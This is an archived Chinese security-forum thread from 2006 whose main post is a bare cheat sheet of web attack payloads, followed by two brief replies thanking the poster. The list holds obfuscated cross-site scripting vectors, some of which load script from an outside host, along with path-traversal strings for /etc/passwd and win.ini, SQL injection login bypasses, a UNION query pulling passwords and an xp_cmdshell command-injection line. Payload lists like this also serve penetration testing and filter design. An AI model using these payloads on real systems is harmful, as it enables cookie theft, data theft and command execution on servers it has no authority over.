岁月联盟 - 技术社区 - BBS.SYUE.COM's Archiver

admin 发表于 2006-9-3 00:26

XSS测试语句大全

&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; <br/>='&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; <br/>&lt;script&gt;alert(document.cookie)&lt;/script&gt; <br/>&lt;script&gt;alert(vulnerable)&lt;/script&gt; <br/>%3Cscript%3Ealert('XSS')%3C/script%3E <br/>&lt;s&amp;#99;ript&gt;alert('XSS')&lt;/script&gt; <br/>&lt;img src="javas&amp;#99;ript:alert('XSS')"&gt; <br/>%0a%0a&lt;script&gt;alert(\"Vulnerable\")&lt;/script&gt;.jsp <br/>%22%3cscript%3ealert(%22xss%22)%3c/script%3e <br/>%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd <br/>%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini <br/>%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e <br/>%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e <br/>%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html <br/>%3f.jsp <br/>%3f.jsp <br/>&amp;lt;script&amp;gt;alert('Vulnerable');&amp;lt;/script&amp;gt <br/>&lt;script&gt;alert('Vulnerable')&lt;/script&gt; <br/>?sql_debug=1 <br/>a%5c.aspx <br/>a.jsp/&lt;script&gt;alert('Vulnerable')&lt;/script&gt; <br/>a/ <br/>a?&lt;script&gt;alert('Vulnerable')&lt;/script&gt; <br/>"&gt;&lt;script&gt;alert('Vulnerable')&lt;/script&gt; <br/>';exec%20master..xp_cmdshell%20'dir%20 c:%20&gt;%20c:\inetpub\wwwroot\?.txt'--&amp;&amp; <br/>%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E <br/>%3Cscript%3Ealert(document. domain);%3C/script%3E&amp; <br/>%3Cscript%3Ealert(document.domain);%3C/script%3E&amp;SESSION_ID={SESSION_ID}&amp;SESSION_ID= <br/>1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= <br/>../../../../../../../../etc/passwd <br/>..\..\..\..\..\..\..\..\windows\system.ini <br/>\..\..\..\..\..\..\..\..\windows\system.ini <br/>'';!--"&lt;XSS&gt;=&amp;{()} <br/>&lt;IMG SRC="javascript:alert('XSS');"&gt; <br/>&lt;IMG SRC=javascript:alert('XSS')&gt; <br/>&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; <br/>&lt;IMG SRC=JaVaScRiPt:alert(&amp;quot;XSS&amp;quot;)&gt; <br/>&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41&gt; <br/>&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt; <br/>&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt; <br/>&lt;IMG SRC="jav&amp;#x09;ascript:alert('XSS');"&gt; <br/>&lt;IMG SRC="jav&amp;#x0A;ascript:alert('XSS');"&gt; <br/>&lt;IMG SRC="jav&amp;#x0D;ascript:alert('XSS');"&gt; <br/>"&lt;IMG SRC=java\0script:alert(\"XSS\")&gt;";' &gt; out <br/>&lt;IMG SRC=" javascript:alert('XSS');"&gt; <br/>&lt;SCRIPT&gt;a=/XSS/alert(a.source)&lt;/SCRIPT&gt; <br/>&lt;BODY BACKGROUND="javascript:alert('XSS')"&gt; <br/>&lt;BODY ONLOAD=alert('XSS')&gt; <br/>&lt;IMG DYNSRC="javascript:alert('XSS')"&gt; <br/>&lt;IMG LOWSRC="javascript:alert('XSS')"&gt; <br/>&lt;BGSOUND SRC="javascript:alert('XSS');"&gt; <br/>&lt;br size="&amp;{alert('XSS')}"&gt; <br/>&lt;LAYER SRC="<a href="http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/layer">http://xss.ha.ckers.org/a.js"&gt;&lt;/layer</a>&gt; <br/>&lt;LINK REL="stylesheet" HREF="javascript:alert('XSS');"&gt; <br/>&lt;IMG SRC='vbscript:msgbox("XSS")'&gt; <br/>&lt;IMG SRC="mocha:[code]"&gt; <br/>&lt;IMG SRC="livescript:[code]"&gt; <br/>&lt;META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"&gt; <br/>&lt;IFRAME SRC=javascript:alert('XSS')&gt;&lt;/IFRAME&gt; <br/>&lt;FRAMESET&gt;&lt;FRAME SRC=javascript:alert('XSS')&gt;&lt;/FRAME&gt;&lt;/FRAMESET&gt; <br/>&lt;TABLE BACKGROUND="javascript:alert('XSS')"&gt; <br/>&lt;DIV STYLE="background-image: url(javascript:alert('XSS'))"&gt; <br/>&lt;DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"&gt; <br/>&lt;DIV STYLE="width: expression(alert('XSS'));"&gt; <br/>&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert("XSS")';&lt;/STYLE&gt; <br/>&lt;IMG STYLE='xss:expre\ssion(alert("XSS"))'&gt; <br/>&lt;STYLE TYPE="text/javascript"&gt;alert('XSS');&lt;/STYLE&gt; <br/>&lt;STYLE TYPE="text/css"&gt;.XSS{background-image:url("javascript:alert('XSS')");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; <br/>&lt;STYLE type="text/css"&gt;BODY{background:url("javascript:alert('XSS')")}&lt;/STYLE&gt; <br/>&lt;BASE HREF="javascript:alert('XSS');//"&gt; <br/>getURL("javascript:alert('XSS')") <br/>a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d); <br/>&lt;XML SRC="javascript:alert('XSS');"&gt; <br/>"&gt; &lt;BODY ONLOAD="a();"&gt;&lt;SCRIPT&gt;function a(){alert('XSS');}&lt;/SCRIPT&gt;&lt;" <br/>&lt;SCRIPT SRC="<a href="http://xss.ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT">http://xss.ha.ckers.org/xss.jpg"&gt;&lt;/SCRIPT</a>&gt; <br/>&lt;IMG SRC="javascript:alert('XSS')" <br/>&lt;!--#exec cmd="/bin/echo '&lt;SCRIPT SRC'"--&gt;&lt;!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js&gt;&lt;/SCRIPT&gt;'"--&gt; <br/>&lt;IMG SRC="<a href="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode</a>"&gt; <br/>&lt;SCRIPT a="&gt;" SRC="<a href="http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/SCRIPT">http://xss.ha.ckers.org/a.js"&gt;&lt;/SCRIPT</a>&gt; <br/>&lt;SCRIPT ="&gt;" SRC="<a href="http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/SCRIPT">http://xss.ha.ckers.org/a.js"&gt;&lt;/SCRIPT</a>&gt; <br/>&lt;SCRIPT a="&gt;" '' SRC="<a href="http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/SCRIPT">http://xss.ha.ckers.org/a.js"&gt;&lt;/SCRIPT</a>&gt; <br/>&lt;SCRIPT "a='&gt;'" SRC="<a href="http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/SCRIPT">http://xss.ha.ckers.org/a.js"&gt;&lt;/SCRIPT</a>&gt; <br/>&lt;SCRIPT&gt;document.write("&lt;SCRI");&lt;/SCRIPT&gt;PT SRC="<a href="http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/SCRIPT">http://xss.ha.ckers.org/a.js"&gt;&lt;/SCRIPT</a>&gt; <br/>&lt;A HREF=http://www.gohttp://www.google.com/ogle.com/&gt;link&lt;/A&gt; <br/>admin'-- <br/>' or 0=0 -- <br/>" or 0=0 -- <br/>or 0=0 -- <br/>' or 0=0 # <br/>" or 0=0 # <br/>or 0=0 # <br/>' or 'x'='x <br/>" or "x"="x <br/>') or ('x'='x <br/>' or 1=1-- <br/>" or 1=1-- <br/>or 1=1-- <br/>' or a=a-- <br/>" or "a"="a <br/>') or ('a'='a <br/>") or ("a"="a <br/>hi" or "a"="a <br/>hi" or 1=1 -- <br/>hi' or 1=1 -- <br/>hi' or 'a'='a <br/>hi') or ('a'='a <br/>hi") or ("a"="a<p></p>

黑暗传说 发表于 2008-3-31 14:26

XSS测试语句大全,真的好好看一下跨库语句

xyh1020 发表于 2008-4-10 12:17

学习了,

页: [1]

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.